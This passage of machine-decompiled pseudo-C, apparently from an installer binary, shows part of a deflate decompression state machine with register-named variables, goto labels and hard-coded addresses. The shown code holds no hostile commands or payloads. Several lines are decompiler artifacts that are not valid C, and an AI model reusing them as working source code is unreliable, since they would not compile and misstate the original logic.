                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L106:
                                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                  											__ecx = __esi[2];
                                                  											__eax = __esi[2] + __eax * 4;
                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                  											__ecx =  *__eax & 0x000000ff;
                                                  											__eflags = __ecx;
                                                  											if(__ecx != 0) {
                                                  												L108:
                                                  												__eflags = __cl & 0x00000010;
                                                  												if((__cl & 0x00000010) == 0) {
                                                  													L110:
                                                  													__eflags = __cl & 0x00000040;
                                                  													if((__cl & 0x00000040) == 0) {
                                                  														goto L125;
                                                  													}
                                                  													L111:
                                                  													__eflags = __cl & 0x00000020;
                                                  													if((__cl & 0x00000020) == 0) {
                                                  														goto L9;
                                                  													}
                                                  													L112:
                                                  													 *__esi = 7;
                                                  													goto L180;
                                                  												}
                                                  												L109:
                                                  												__esi[2] = __ecx;
                                                  												__esi[1] = __eax;
                                                  												 *__esi = 2;
                                                  												goto L180;
                                                  											}
                                                  											L107:
                                                  											__esi[2] = __eax;
                                                  											 *__esi = 6;
                                                  											goto L180;
                                                  										case 2:
                                                  											L113:
                                                  											__eax = __esi[2];
                                                  											while(1) {
                                                  												L116:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L114:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L115:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L117:
                                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  											__ecx = __eax;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - __eax;
                                                  											__eflags = __ebx;
                                                  											__eax = __esi[4] & 0x000000ff;
                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                  											__eax = __esi[6];
                                                  											__esi[2] = __esi[6];
                                                  											 *__esi = 3;
                                                  											goto L118;
                                                  										case 3:
                                                  											L118:
                                                  											__eax = __esi[3];
                                                  											while(1) {
                                                  												L121:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L119:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L120:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L122:
                                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                  											__ecx = __esi[2];
                                                  											__eax = __esi[2] + __eax * 4;
                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                  											__ecx =  *__eax & 0x000000ff;
                                                  											__eflags = __cl & 0x00000010;
                                                  											if((__cl & 0x00000010) == 0) {
                                                  												L124:
                                                  												__eflags = __cl & 0x00000040;
                                                  												if((__cl & 0x00000040) != 0) {
                                                  													goto L9;
                                                  												}
                                                  												L125:
                                                  												__esi[3] = __ecx;
                                                  												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                  												__esi[2] = __eax;
                                                  												goto L180;
                                                  											}
                                                  											L123:
                                                  											__esi[2] = __ecx;
                                                  											__esi[3] = __eax;
                                                  											 *__esi = 4;
                                                  											goto L180;
                                                  										case 4:
                                                  											L126:
                                                  											__eax = __esi[2];
                                                  											while(1) {
                                                  												L129:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L127:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L128:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L130:
                                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  											__ecx = __eax;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - __eax;
                                                  											__eflags = __ebx;
                                                  											 *__esi = 5;
                                                  											goto L131;
                                                  										case 5:
                                                  											L131:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__edx = __esi[3];
                                                  											__eax = __eax - __esi;
                                                  											__ecx = __eax - __esi - 0x1ba0;
                                                  											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                  											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                  												__ecx = __eax;
                                                  												__ecx = __eax - __edx;
                                                  												__eflags = __ecx;
                                                  											} else {
                                                  												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                  												__ecx = __esi[0x26e8] - __edx - __esi;
                                                  												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                  											}
                                                  											__eflags = __esi[1];
                                                  											 *(__ebp - 0x20) = __ecx;
                                                  											if(__esi[1] != 0) {
                                                  												L135:
                                                  												__edi =  *(__ebp - 0x2c);
                                                  												do {
                                                  													L136:
                                                  													__eflags = __edi;
                                                  													if(__edi != 0) {
                                                  														goto L152;
                                                  													}
                                                  													L137:
                                                  													__edi = __esi[0x26e8];
                                                  													__eflags = __eax - __edi;
                                                  													if(__eax != __edi) {
                                                  														L143:
                                                  														__esi[0x26ea] = __eax;
                                                  														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  														__eax = __esi[0x26ea];
                                                  														__ecx = __esi[0x26e9];
                                                  														__eflags = __eax - __ecx;
                                                  														 *(__ebp - 0x30) = __eax;
                                                  														if(__eax >= __ecx) {
                                                  															__edi = __esi[0x26e8];
                                                  															__edi = __esi[0x26e8] - __eax;
                                                  															__eflags = __edi;
                                                  														} else {
                                                  															__ecx = __ecx - __eax;
                                                  															__edi = __ecx - __eax - 1;
                                                  														}
                                                  														__edx = __esi[0x26e8];
                                                  														__eflags = __eax - __edx;
                                                  														 *(__ebp - 8) = __edx;
                                                  														if(__eax == __edx) {
                                                  															__edx =  &(__esi[0x6e8]);
                                                  															__eflags = __ecx - __edx;
                                                  															if(__ecx != __edx) {
                                                  																__eax = __edx;
                                                  																__eflags = __eax - __ecx;
                                                  																 *(__ebp - 0x30) = __eax;
                                                  																if(__eax >= __ecx) {
                                                  																	__edi =  *(__ebp - 8);
                                                  																	__edi =  *(__ebp - 8) - __eax;
                                                  																	__eflags = __edi;
                                                  																} else {
                                                  																	__ecx = __ecx - __eax;
                                                  																	__edi = __ecx;
                                                  																}
                                                  															}
                                                  														}
                                                  														__eflags = __edi;
                                                  														if(__edi == 0) {
                                                  															goto L183;
                                                  														} else {
                                                  															goto L152;
                                                  														}
                                                  													}
                                                  													L138:
                                                  													__ecx = __esi[0x26e9];
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __ecx - __edx;
                                                  													if(__ecx == __edx) {
                                                  														goto L143;
                                                  													}
                                                  													L139:
                                                  													__eax = __edx;
                                                  													__eflags = __eax - __ecx;
                                                  													if(__eax >= __ecx) {
                                                  														__edi = __edi - __eax;
                                                  														__eflags = __edi;
                                                  													} else {
                                                  														__ecx = __ecx - __eax;
                                                  														__edi = __ecx;
                                                  													}
                                                  													__eflags = __edi;
                                                  													if(__edi == 0) {
                                                  														goto L143;
                                                  													}
                                                  													L152:
                                                  													__ecx =  *(__ebp - 0x20);
                                                  													 *__eax =  *__ecx;
                                                  													__eax = __eax + 1;
                                                  													__ecx = __ecx + 1;
                                                  													__edi = __edi - 1;
                                                  													__eflags = __ecx - __esi[0x26e8];
                                                  													 *(__ebp - 0x30) = __eax;
                                                  													 *(__ebp - 0x20) = __ecx;
                                                  													 *(__ebp - 0x2c) = __edi;
                                                  													if(__ecx == __esi[0x26e8]) {
                                                  														__ecx =  &(__esi[0x6e8]);
                                                  														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                  													}
                                                  													_t357 =  &(__esi[1]);
                                                  													 *_t357 = __esi[1] - 1;
                                                  													__eflags =  *_t357;
                                                  												} while ( *_t357 != 0);
                                                  											}
                                                  											goto L23;
                                                  										case 6:
                                                  											L156:
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											__edi =  *(__ebp - 0x30);
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												L172:
                                                  												__cl = __esi[2];
                                                  												 *__edi = __cl;
                                                  												__edi = __edi + 1;
                                                  												__eax = __eax - 1;
                                                  												 *(__ebp - 0x30) = __edi;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												goto L23;
                                                  											}
                                                  											L157:
                                                  											__ecx = __esi[0x26e8];
                                                  											__eflags = __edi - __ecx;
                                                  											if(__edi != __ecx) {
                                                  												L163:
                                                  												__esi[0x26ea] = __edi;
                                                  												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  												__edi = __esi[0x26ea];
                                                  												__ecx = __esi[0x26e9];
                                                  												__eflags = __edi - __ecx;
                                                  												 *(__ebp - 0x30) = __edi;
                                                  												if(__edi >= __ecx) {
                                                  													__eax = __esi[0x26e8];
                                                  													__eax = __esi[0x26e8] - __edi;
                                                  													__eflags = __eax;
                                                  												} else {
                                                  													__ecx = __ecx - __edi;
                                                  													__eax = __ecx - __edi - 1;
                                                  												}
                                                  												__edx = __esi[0x26e8];
                                                  												__eflags = __edi - __edx;
                                                  												 *(__ebp - 8) = __edx;
                                                  												if(__edi == __edx) {
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __ecx - __edx;
                                                  													if(__ecx != __edx) {
                                                  														__edi = __edx;
                                                  														__eflags = __edi - __ecx;
                                                  														 *(__ebp - 0x30) = __edi;
                                                  														if(__edi >= __ecx) {
                                                  															__eax =  *(__ebp - 8);
                                                  															__eax =  *(__ebp - 8) - __edi;
                                                  															__eflags = __eax;
                                                  														} else {
                                                  															__ecx = __ecx - __edi;
                                                  															__eax = __ecx;
                                                  														}
                                                  													}
                                                  												}
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													goto L183;
                                                  												} else {
                                                  													goto L172;
                                                  												}
                                                  											}
                                                  											L158:
                                                  											__eax = __esi[0x26e9];
                                                  											__edx =  &(__esi[0x6e8]);
                                                  											__eflags = __eax - __edx;
                                                  											if(__eax == __edx) {
                                                  												goto L163;
                                                  											}
                                                  											L159:
                                                  											__edi = __edx;
                                                  											__eflags = __edi - __eax;
                                                  											if(__edi >= __eax) {
                                                  												__ecx = __ecx - __edi;
                                                  												__eflags = __ecx;
                                                  												__eax = __ecx;
                                                  											} else {
                                                  												__eax = __eax - __edi;
                                                  												__eax = __eax - 1;
                                                  											}
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L172;
                                                  											} else {
                                                  												goto L163;
                                                  											}
                                                  										case 7:
                                                  											L173:
                                                  											__eflags = __ebx - 7;
                                                  											if(__ebx > 7) {
                                                  												__ebx = __ebx - 8;
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                  												_t380 = __ebp - 0x38;
                                                  												 *_t380 =  *(__ebp - 0x38) - 1;
                                                  												__eflags =  *_t380;
                                                  											}
                                                  											goto L175;
                                                  										case 8:
                                                  											L4:
                                                  											while(_t425 < 3) {
                                                  												if( *(_t448 - 0x34) == 0) {
                                                  													goto L182;
                                                  												} else {
                                                  													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                  													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                  													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                  													_t425 = _t425 + 8;
                                                  													continue;
                                                  												}
                                                  											}
                                                  											_t425 = _t425 - 3;
                                                  											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                  											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                  											asm("sbb ecx, ecx");
                                                  											_t408 = _t406 >> 1;
                                                  											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                  											if(_t408 == 0) {
                                                  												L24:
                                                  												 *_t446 = 9;
                                                  												_t436 = _t425 & 0x00000007;
                                                  												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                  												_t425 = _t425 - _t436;
                                                  												goto L180;
                                                  											}
                                                  											L6:
                                                  											_t411 = _t408 - 1;
                                                  											if(_t411 == 0) {
                                                  												L13:
                                                  												__eflags =  *0x432e90;
                                                  												if( *0x432e90 != 0) {
                                                  													L22:
                                                  													_t412 =  *0x40a5e8; // 0x9
                                                  													_t446[4] = _t412;
                                                  													_t413 =  *0x40a5ec; // 0x5
                                                  													_t446[4] = _t413;
                                                  													_t414 =  *0x431d0c; // 0x0
                                                  													_t446[5] = _t414;
                                                  													_t415 =  *0x431d08; // 0x0
                                                  													_t446[6] = _t415;
                                                  													L23:
                                                  													 *_t446 =  *_t446 & 0x00000000;
                                                  													goto L180;
                                                  												} else {
                                                  													_t26 = _t448 - 8;
                                                  													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                  													__eflags =  *_t26;
                                                  													_t416 = 0x431d10;
                                                  													goto L15;
                                                  													L20:
                                                  													 *_t416 = _t438;
                                                  													_t416 = _t416 + 4;
                                                  													__eflags = _t416 - 0x432190;
                                                  													if(_t416 < 0x432190) {
                                                  														L15:
                                                  														__eflags = _t416 - 0x431f4c;
                                                  														_t438 = 8;
                                                  														if(_t416 > 0x431f4c) {
                                                  															__eflags = _t416 - 0x432110;
                                                  															if(_t416 >= 0x432110) {
                                                  																__eflags = _t416 - 0x432170;
                                                  																if(_t416 < 0x432170) {
                                                  																	_t438 = 7;
                                                  																}
                                                  															} else {
                                                  																_t438 = 9;
                                                  															}
                                                  														}
                                                  														goto L20;
                                                  													} else {
                                                  														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                  														_push(0x1e);
                                                  														_pop(_t440);
                                                  														_push(5);
                                                  														_pop(_t419);
                                                  														memset(0x431d10, _t419, _t440 << 2);
                                                  														_t450 = _t450 + 0xc;
                                                  														_t442 = 0x431d10 + _t440;
                                                  														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                  														 *0x432e90 =  *0x432e90 + 1;
                                                  														__eflags =  *0x432e90;
                                                  														goto L22;
                                                  													}
                                                  												}
                                                  											}
                                                  											L7:
                                                  											_t423 = _t411 - 1;
                                                  											if(_t423 == 0) {
                                                  												 *_t446 = 0xb;
                                                  												goto L180;
                                                  											}
                                                  											L8:
                                                  											if(_t423 != 1) {
                                                  												goto L180;
                                                  											}
                                                  											goto L9;
                                                  										case 9:
                                                  											while(1) {
                                                  												L27:
                                                  												__eflags = __ebx - 0x20;
                                                  												if(__ebx >= 0x20) {
                                                  													break;
                                                  												}
                                                  												L25:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L26:
                                                  												__eax =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__ecx = __ebx;
                                                  												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L28:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__ebx = 0;
                                                  											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                  											 *(__ebp - 0x40) = 0;
                                                  											__eflags = __eax;
                                                  											__esi[1] = __eax;
                                                  											if(__eax == 0) {
                                                  												goto L53;
                                                  											}
                                                  											L29:
                                                  											_push(0xa);
                                                  											_pop(__eax);
                                                  											goto L54;
                                                  										case 0xa:
                                                  											L30:
                                                  											__eflags =  *(__ebp - 0x34);
                                                  											if( *(__ebp - 0x34) == 0) {
                                                  												goto L182;
                                                  											}
                                                  											L31:
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												L48:
                                                  												__eflags = __eax -  *(__ebp - 0x34);
                                                  												if(__eax >=  *(__ebp - 0x34)) {
                                                  													__eax =  *(__ebp - 0x34);
                                                  												}
                                                  												__ecx = __esi[1];
                                                  												__eflags = __ecx - __eax;
                                                  												__edi = __ecx;
                                                  												if(__ecx >= __eax) {
                                                  													__edi = __eax;
                                                  												}
                                                  												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                  												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                  												_t80 =  &(__esi[1]);
                                                  												 *_t80 = __esi[1] - __edi;
                                                  												__eflags =  *_t80;
                                                  												if( *_t80 == 0) {
                                                  													L53:
                                                  													__eax = __esi[0x145];
                                                  													L54:
                                                  													 *__esi = __eax;
                                                  												}
                                                  												goto L180;
                                                  											}
                                                  											L32:
                                                  											__ecx = __esi[0x26e8];
                                                  											__edx =  *(__ebp - 0x30);
                                                  											__eflags = __edx - __ecx;
                                                  											if(__edx != __ecx) {
                                                  												L38:
                                                  												__esi[0x26ea] = __edx;
                                                  												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  												__edx = __esi[0x26ea];
                                                  												__ecx = __esi[0x26e9];
                                                  												__eflags = __edx - __ecx;
                                                  												 *(__ebp - 0x30) = __edx;
                                                  												if(__edx >= __ecx) {
                                                  													__eax = __esi[0x26e8];
                                                  													__eax = __esi[0x26e8] - __edx;
                                                  													__eflags = __eax;
                                                  												} else {
                                                  													__ecx = __ecx - __edx;
                                                  													__eax = __ecx - __edx - 1;
                                                  												}
                                                  												__edi = __esi[0x26e8];
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												__eflags = __edx - __edi;
                                                  												if(__edx == __edi) {
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __edx - __ecx;
                                                  													if(__eflags != 0) {
                                                  														 *(__ebp - 0x30) = __edx;
                                                  														if(__eflags >= 0) {
                                                  															__edi = __edi - __edx;
                                                  															__eflags = __edi;
                                                  															__eax = __edi;
                                                  														} else {
                                                  															__ecx = __ecx - __edx;
                                                  															__eax = __ecx;
                                                  														}
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  													}
                                                  												}
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													goto L183;
                                                  												} else {
                                                  													goto L48;
                                                  												}
                                                  											}
                                                  											L33:
                                                  											__eax = __esi[0x26e9];
                                                  											__edi =  &(__esi[0x6e8]);
                                                  											__eflags = __eax - __edi;
                                                  											if(__eax == __edi) {
                                                  												goto L38;
                                                  											}
                                                  											L34:
                                                  											__edx = __edi;
                                                  											__eflags = __edx - __eax;
                                                  											 *(__ebp - 0x30) = __edx;
                                                  											if(__edx >= __eax) {
                                                  												__ecx = __ecx - __edx;
                                                  												__eflags = __ecx;
                                                  												__eax = __ecx;
                                                  											} else {
                                                  												__eax = __eax - __edx;
                                                  												__eax = __eax - 1;
                                                  											}
                                                  											__eflags = __eax;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L48;
                                                  											} else {
                                                  												goto L38;
                                                  											}
                                                  										case 0xb:
                                                  											goto L56;
                                                  										case 0xc:
                                                  											L60:
                                                  											__esi[1] = __esi[1] >> 0xa;
                                                  											__eax = (__esi[1] >> 0xa) + 4;
                                                  											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                  												goto L68;
                                                  											}
                                                  											goto L61;
                                                  										case 0xd:
                                                  											while(1) {
                                                  												L93:
                                                  												__eax = __esi[1];
                                                  												__ecx = __esi[2];
                                                  												__edx = __eax;
                                                  												__eax = __eax & 0x0000001f;
                                                  												__edx = __edx >> 5;
                                                  												__eax = __edx + __eax + 0x102;
                                                  												__eflags = __esi[2] - __eax;
                                                  												if(__esi[2] >= __eax) {
                                                  													break;
                                                  												}
                                                  												L73:
                                                  												__eax = __esi[0x143];
                                                  												while(1) {
                                                  													L76:
                                                  													__eflags = __ebx - __eax;
                                                  													if(__ebx >= __eax) {
                                                  														break;
                                                  													}
                                                  													L74:
                                                  													__eflags =  *(__ebp - 0x34);
                                                  													if( *(__ebp - 0x34) == 0) {
                                                  														goto L182;
                                                  													}
                                                  													L75:
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  													__ecx = __ebx;
                                                  													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  													__ebx = __ebx + 8;
                                                  													__eflags = __ebx;
                                                  												}
                                                  												L77:
                                                  												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                  												__eax = __eax &  *(__ebp - 0x40);
                                                  												__ecx = __esi[0x144];
                                                  												__eax = __esi[0x144] + __eax * 4;
                                                  												__edx =  *(__eax + 1) & 0x000000ff;
                                                  												__eax =  *(__eax + 2) & 0x0000ffff;
                                                  												__eflags = __eax - 0x10;
                                                  												 *(__ebp - 0x14) = __eax;
                                                  												if(__eax >= 0x10) {
                                                  													L79:
                                                  													__eflags = __eax - 0x12;
                                                  													if(__eax != 0x12) {
                                                  														__eax = __eax + 0xfffffff2;
                                                  														 *(__ebp - 8) = 3;
                                                  													} else {
                                                  														_push(7);
                                                  														 *(__ebp - 8) = 0xb;
                                                  														_pop(__eax);
                                                  													}
                                                  													while(1) {
                                                  														L84:
                                                  														__ecx = __eax + __edx;
                                                  														__eflags = __ebx - __eax + __edx;
                                                  														if(__ebx >= __eax + __edx) {
                                                  															break;
                                                  														}
                                                  														L82:
                                                  														__eflags =  *(__ebp - 0x34);
                                                  														if( *(__ebp - 0x34) == 0) {
                                                  															goto L182;
                                                  														}
                                                  														L83:
                                                  														__ecx =  *(__ebp - 0x38);
                                                  														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  														__ecx = __ebx;
                                                  														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  														__ebx = __ebx + 8;
                                                  														__eflags = __ebx;
                                                  													}
                                                  													L85:
                                                  													__ecx = __edx;
                                                  													__ebx = __ebx - __edx;
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  													__edx =  *(__ebp - 8);
                                                  													__ebx = __ebx - __eax;
                                                  													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  													__ecx = __eax;
                                                  													__eax = __esi[1];
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  													__ecx = __esi[2];
                                                  													__eax = __eax >> 5;
                                                  													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                  													__eax = __eax & 0x0000001f;
                                                  													__eax = __edi + __eax + 0x102;
                                                  													__edi = __edx + __ecx;
                                                  													__eflags = __edx + __ecx - __eax;
                                                  													if(__edx + __ecx > __eax) {
                                                  														goto L9;
                                                  													}
                                                  													L86:
                                                  													__eflags =  *(__ebp - 0x14) - 0x10;
                                                  													if( *(__ebp - 0x14) != 0x10) {
                                                  														L89:
                                                  														__edi = 0;
                                                  														__eflags = 0;
                                                  														L90:
                                                  														__eax = __esi + 0xc + __ecx * 4;
                                                  														do {
                                                  															L91:
                                                  															 *__eax = __edi;
                                                  															__ecx = __ecx + 1;
                                                  															__eax = __eax + 4;
                                                  															__edx = __edx - 1;
                                                  															__eflags = __edx;
                                                  														} while (__edx != 0);
                                                  														__esi[2] = __ecx;
                                                  														continue;
                                                  													}
                                                  													L87:
                                                  													__eflags = __ecx - 1;
                                                  													if(__ecx < 1) {
                                                  														goto L9;
                                                  													}
                                                  													L88:
                                                  													__edi =  *(__esi + 8 + __ecx * 4);
                                                  													goto L90;
                                                  												}
                                                  												L78:
                                                  												__ecx = __edx;
                                                  												__ebx = __ebx - __edx;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  												__ecx = __esi[2];
                                                  												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                  												__esi[2] = __esi[2] + 1;
                                                  											}
                                                  											L94:
                                                  											__eax = __esi[1];
                                                  											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                  											__edi = __eax;
                                                  											__eax = __eax >> 5;
                                                  											__edi = __edi & 0x0000001f;
                                                  											__ecx = 0x101;
                                                  											__eax = __eax & 0x0000001f;
                                                  											__edi = __edi + 0x101;
                                                  											__eax = __eax + 1;
                                                  											__edx = __ebp - 0xc;
                                                  											 *(__ebp - 0x14) = __eax;
                                                  											 &(__esi[0x148]) = __ebp - 4;
                                                  											 *(__ebp - 4) = 9;
                                                  											__ebp - 0x18 =  &(__esi[3]);
                                                  											 *(__ebp - 0x10) = 6;
                                                  											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                  											__eflags =  *(__ebp - 4);
                                                  											if( *(__ebp - 4) == 0) {
                                                  												__eax = __eax | 0xffffffff;
                                                  												__eflags = __eax;
                                                  											}
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L9;
                                                  											} else {
                                                  												L97:
                                                  												__ebp - 0xc =  &(__esi[0x148]);
                                                  												__ebp - 0x10 = __ebp - 0x1c;
                                                  												__eax = __esi + 0xc + __edi * 4;
